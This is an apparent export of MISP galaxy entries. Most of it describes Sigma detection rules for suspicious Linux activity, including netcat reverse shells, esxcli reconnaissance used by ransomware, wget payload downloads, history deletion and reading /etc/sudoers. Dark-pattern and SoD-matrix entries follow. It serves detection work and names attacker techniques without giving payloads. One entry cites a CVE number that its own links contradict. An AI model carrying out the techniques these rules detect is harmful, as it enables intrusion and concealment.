ESXi Storage Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.

The tag is: misp-galaxy:sigma-rules="ESXi Storage Information Discovery Via ESXCLI"

ESXi Storage Information Discovery Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11641. Table References

Links

https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html

https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml

ESXi Network Configuration Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.

The tag is: misp-galaxy:sigma-rules="ESXi Network Configuration Discovery Via ESXCLI"

ESXi Network Configuration Discovery Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11642. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html

https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml

Suspicious Java Children Processes

Detects java process spawning suspicious children

The tag is: misp-galaxy:sigma-rules="Suspicious Java Children Processes"

Suspicious Java Children Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11643. Table References

Links

https://www.tecmint.com/different-types-of-linux-shells/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml

Potential Container Discovery Via Inodes Listing

Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.

The tag is: misp-galaxy:sigma-rules="Potential Container Discovery Via Inodes Listing"

Potential Container Discovery Via Inodes Listing has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11644. Table References

Links

https://blog.skyplabs.net/posts/container-detection/

https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml

Process Discovery

Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network

The tag is: misp-galaxy:sigma-rules="Process Discovery"

Process Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 11645. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml

Remove Immutable File Attribute

Detects usage of the 'chattr' utility to remove immutable file attribute.

The tag is: misp-galaxy:sigma-rules="Remove Immutable File Attribute"

Remove Immutable File Attribute has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

Table 11646. Table References

Links

https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml

Potential Suspicious Change To Sensitive/Critical Files

Detects changes of sensitive and critical files. Monitors files that you don’t expect to change without planning on Linux system.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Change To Sensitive/Critical Files"

Potential Suspicious Change To Sensitive/Critical Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 11647. Table References

Links

https://docs.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml

OMIGOD SCX RunAsProvider ExecuteShellCommand

Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.

The tag is: misp-galaxy:sigma-rules="OMIGOD SCX RunAsProvider ExecuteShellCommand"

OMIGOD SCX RunAsProvider ExecuteShellCommand has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 11648. Table References

Links

https://github.com/Azure/Azure-Sentinel/pull/3059

https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml

Potential Netcat Reverse Shell Execution

Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.

The tag is: misp-galaxy:sigma-rules="Potential Netcat Reverse Shell Execution"

Potential Netcat Reverse Shell Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11649. Table References

Links

https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/

https://man7.org/linux/man-pages/man1/ncat.1.html

https://www.infosecademy.com/netcat-reverse-shells/

https://www.revshells.com/

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml

Nohup Execution

Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments

The tag is: misp-galaxy:sigma-rules="Nohup Execution"

Nohup Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11650. Table References

Links

https://www.computerhope.com/unix/unohup.htm

https://gtfobins.github.io/gtfobins/nohup/

https://en.wikipedia.org/wiki/Nohup

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml

Install Root Certificate

Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s

The tag is: misp-galaxy:sigma-rules="Install Root Certificate"

Install Root Certificate has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 11651. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml

Remove Scheduled Cron Task/Job

Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible

The tag is: misp-galaxy:sigma-rules="Remove Scheduled Cron Task/Job"

Table 11652. Table References

Links

https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml

Potentially Suspicious Named Pipe Created Via Mkfifo

Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Named Pipe Created Via Mkfifo"

Table 11653. Table References

Links

https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml

Connection Proxy

Detects setting proxy configuration

The tag is: misp-galaxy:sigma-rules="Connection Proxy"

Connection Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 11654. Table References

Links

https://attack.mitre.org/techniques/T1090/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml

ESXi VSAN Information Discovery Via ESXCLI

Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.

The tag is: misp-galaxy:sigma-rules="ESXi VSAN Information Discovery Via ESXCLI"

ESXi VSAN Information Discovery Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 11655. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html

https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html

https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml

Docker Container Discovery Via Dockerenv Listing

Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery

The tag is: misp-galaxy:sigma-rules="Docker Container Discovery Via Dockerenv Listing"

Docker Container Discovery Via Dockerenv Listing has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11656. Table References

Links

https://blog.skyplabs.net/posts/container-detection/

https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml

ESXi Account Creation Via ESXCLI

Detects user account creation on ESXi system via esxcli

The tag is: misp-galaxy:sigma-rules="ESXi Account Creation Via ESXCLI"

ESXi Account Creation Via ESXCLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"

Table 11657. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml

File Deletion

Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity

The tag is: misp-galaxy:sigma-rules="File Deletion"

File Deletion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 11659. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml

Potential Linux Amazon SSM Agent Hijacking

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

The tag is: misp-galaxy:sigma-rules="Potential Linux Amazon SSM Agent Hijacking"

Potential Linux Amazon SSM Agent Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 11660. Table References

Links

https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/

https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/

https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml

ESXi Admin Permission Assigned To Account Via ESXCLI

Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.

The tag is: misp-galaxy:sigma-rules="ESXi Admin Permission Assigned To Account Via ESXCLI"

Table 11661. Table References

Links

https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml

Container Residence Discovery Via Proc Virtual FS

Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem

The tag is: misp-galaxy:sigma-rules="Container Residence Discovery Via Proc Virtual FS"

Container Residence Discovery Via Proc Virtual FS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11662. Table References

Links

https://blog.skyplabs.net/posts/container-detection/

https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml

Mount Execution With Hidepid Parameter

Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system

The tag is: misp-galaxy:sigma-rules="Mount Execution With Hidepid Parameter"

Mount Execution With Hidepid Parameter has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 11663. Table References

Links

https://blogs.blackberry.com/

https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/

https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml

Download File To Potentially Suspicious Directory Via Wget

Detects the use of wget to download content to a suspicious directory

The tag is: misp-galaxy:sigma-rules="Download File To Potentially Suspicious Directory Via Wget"

Download File To Potentially Suspicious Directory Via Wget has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11664. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml

Linux Doas Tool Execution

Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.

The tag is: misp-galaxy:sigma-rules="Linux Doas Tool Execution"

Linux Doas Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 11665. Table References

Links

https://www.makeuseof.com/how-to-install-and-use-doas/

https://research.splunk.com/endpoint/linux_doas_tool_execution/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml

History File Deletion

Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity

The tag is: misp-galaxy:sigma-rules="History File Deletion"

History File Deletion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 11666. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md

https://github.com/sleventyeleven/linuxprivchecker/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml

Cat Sudoers

Detects the execution of a cat /etc/sudoers to list all users that have sudo rights

The tag is: misp-galaxy:sigma-rules="Cat Sudoers"

Cat Sudoers has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004" with estimative-language:likelihood-probability="almost-certain"

Table 11667. Table References

Links

https://github.com/sleventyeleven/linuxprivchecker/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml

Suspicious Git Clone - Linux

Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious

The tag is: misp-galaxy:sigma-rules="Suspicious Git Clone - Linux"

Suspicious Git Clone - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1593.003" with estimative-language:likelihood-probability="almost-certain"

Table 11668. Table References

Links

https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml

Setuid and Setgid

Detects suspicious change of file privileges with chown and chmod commands

The tag is: misp-galaxy:sigma-rules="Setuid and Setgid"

Setuid and Setgid has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001" with estimative-language:likelihood-probability="almost-certain"

Table 11669. Table References

Links

https://attack.mitre.org/techniques/T1548/001/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml

Apache Spark Shell Command Injection - ProcessCreation

Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective

The tag is: misp-galaxy:sigma-rules="Apache Spark Shell Command Injection - ProcessCreation"

Apache Spark Shell Command Injection - ProcessCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11670. Table References

Links

https://github.com/apache/spark/pull/36315/files

https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html

https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml

Potential GobRAT File Discovery Via Grep

Detects the use of grep to discover specific files created by the GobRAT malware

The tag is: misp-galaxy:sigma-rules="Potential GobRAT File Discovery Via Grep"

Potential GobRAT File Discovery Via Grep has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11671. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml

Potentially Suspicious Execution From Tmp Folder

Detects a potentially suspicious execution of a process located in the '/tmp/' folder

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Execution From Tmp Folder"

Potentially Suspicious Execution From Tmp Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11672. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml

Local Groups Discovery - Linux

Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings

The tag is: misp-galaxy:sigma-rules="Local Groups Discovery - Linux"

Local Groups Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 11673. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml

Triple Cross eBPF Rootkit Install Commands

Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script

The tag is: misp-galaxy:sigma-rules="Triple Cross eBPF Rootkit Install Commands"

Triple Cross eBPF Rootkit Install Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 11675. Table References

Links

https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml

Security Software Discovery - Linux

Detects usage of system utilities (only grep and egrep for now) to discover security software discovery

The tag is: misp-galaxy:sigma-rules="Security Software Discovery - Linux"

Security Software Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 11676. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml

Dark Patterns

Dark Patterns are user interface that tricks users into making decisions that benefit the interface’s holder to the expense of the user..

Dark Patterns is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Jean-Louis Huynen

Nagging

Repeated requests to do something the firms prefer

The tag is: misp-galaxy:social-dark-patterns="Nagging"

Table 11677. Table References

Links

https://dl.acm.org/citation.cfm?id=3174108

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Activity Messages

Misleading notice about other consumers' actions

The tag is: misp-galaxy:social-dark-patterns="Activity Messages"

Table 11678. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Testimonials

Misleading statements from customers

The tag is: misp-galaxy:social-dark-patterns="Testimonials"

Table 11679. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Roach Motel

Asymmetry between signing up and canceling

The tag is: misp-galaxy:social-dark-patterns="Roach Motel"

Table 11680. Table References

Links

https://dl.acm.org/citation.cfm?id=3174108

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Intermediate Currency

Purchases in virtual currency to obscure cost

The tag is: misp-galaxy:social-dark-patterns="Intermediate Currency"

Table 11682. Table References

Links

https://www.darkpatterns.org/

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Hidden subscription / forced continuity

Unanticipated / undesired automatic renewal

The tag is: misp-galaxy:social-dark-patterns="Hidden subscription / forced continuity"

Table 11685. Table References

Links

https://www.darkpatterns.org/

https://dl.acm.org/citation.cfm?id=3174108

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Bait & Switch

Customer sold something other than what’s originally advertised

The tag is: misp-galaxy:social-dark-patterns="Bait & Switch"

Table 11686. Table References

Links

https://dl.acm.org/citation.cfm?id=3174108

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Hidden information / aesthetic manipulation / false hierarchy

Important information visually obscured

The tag is: misp-galaxy:social-dark-patterns="Hidden information / aesthetic manipulation / false hierarchy"

Table 11687. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Preselection

Firm-friendly default is preselected

The tag is: misp-galaxy:social-dark-patterns="Preselection"

Table 11688. Table References

Links

https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Toying with emotion

Emotionally manipulative framing

The tag is: misp-galaxy:social-dark-patterns="Toying with emotion"

Table 11689. Table References

Links

https://dl.acm.org/citation.cfm?id=3174108

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Trick questions

Intentional or obvious ambiguity

The tag is: misp-galaxy:social-dark-patterns="Trick questions"

Table 11690. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://dl.acm.org/citation.cfm?id=3174108

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Disguised Ad

Consumer induced to click on something that isn’t apparent ad

The tag is: misp-galaxy:social-dark-patterns="Disguised Ad"

Table 11691. Table References

Links

https://dl.acm.org/citation.cfm?id=3174108

https://www.darkpatterns.org/types-of-dark-pattern

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Confirmshaming

Choice framed in way that seems dishonest / stupid

The tag is: misp-galaxy:social-dark-patterns="Confirmshaming"

Table 11692. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://www.darkpatterns.org/types-of-dark-pattern

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Forced Registration

Consumer tricked into thinking registration necessary

The tag is: misp-galaxy:social-dark-patterns="Forced Registration"

Table 11693. Table References

Links

https://petsymposium.org/2016/files/papers/Tales_from_the_Dark_SidePrivacy_Dark_Strategies_and_Privacy_Dark_Patterns.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Low stock / high-demand message

Consumer falsely informed of limited quantities

The tag is: misp-galaxy:social-dark-patterns="Low stock / high-demand message"

Table 11694. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

Countdown timer / Limited time message

Opportunity ends soon with blatant false visual cue

The tag is: misp-galaxy:social-dark-patterns="Countdown timer / Limited time message"

Table 11695. Table References

Links

https://webtransparency.cs.princeton.edu/dark-patterns/assets/dark-patterns-v2.pdf

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3431205

SoD Matrix

SOD Matrix.

SoD Matrix is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Koen Van Impe

Delivering training - CSIRT - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [R]"

Delivering training - CSIRT - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [C]"

Delivering training - CSIRT - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [I]"

Delivering training - CSIRT - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - CSIRT - [S]"

Delivering training - LEA - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [R]"

Delivering training - LEA - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [C]"

Delivering training - LEA - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [I]"

Delivering training - LEA - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - LEA - [S]"

Delivering training - Judiciary - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Judiciary - [R]"

Delivering training - Judiciary - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Judiciary - [C]"

Delivering training - Judiciary - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Judiciary - [I]"

Delivering training - Judiciary - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Judiciary - [S]"

Delivering training - Prosecutors - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Prosecutors - [R]"

Delivering training - Prosecutors - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Prosecutors - [C]"

Delivering training - Prosecutors - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Prosecutors - [I]"

Delivering training - Prosecutors - [S]

